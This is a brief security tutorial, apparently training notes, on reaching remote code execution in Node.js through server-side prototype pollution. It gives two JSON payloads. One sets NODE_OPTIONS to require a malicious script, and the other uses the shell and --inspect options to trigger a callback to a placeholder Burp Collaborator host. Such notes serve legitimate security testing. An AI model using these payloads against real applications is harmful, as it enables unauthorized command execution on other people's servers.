RCE via Vulnerable Requests

There are a number of potential command execution sinks in Node, many of which occur in the child_process module. The best way to identify these requests is by polluting the prototype with a payload that triggers an interaction with Burp Collaborator when called.

The NODE_OPTIONS environment variable enables you to define a string of command-line arguments that should be used by default whenever you start a new Node process. As this is also a property on the env object, you can potentially control this via prototype pollution if it is undefined.

"__proto__": {
    "env": {
	    "NODE_OPTIONS": "--require /tmp/malicious.js"
	}
}

Some of Node's functions for creating new child processes accept an optional shell property. We can abuse this together with the Burp Collaborator like:

"__proto__": { 
	"shell":"node", 
	"NODE_OPTIONS":"--inspect=YOUR-COLLABORATOR-ID.oastify.com\"\".oastify\"\".com" }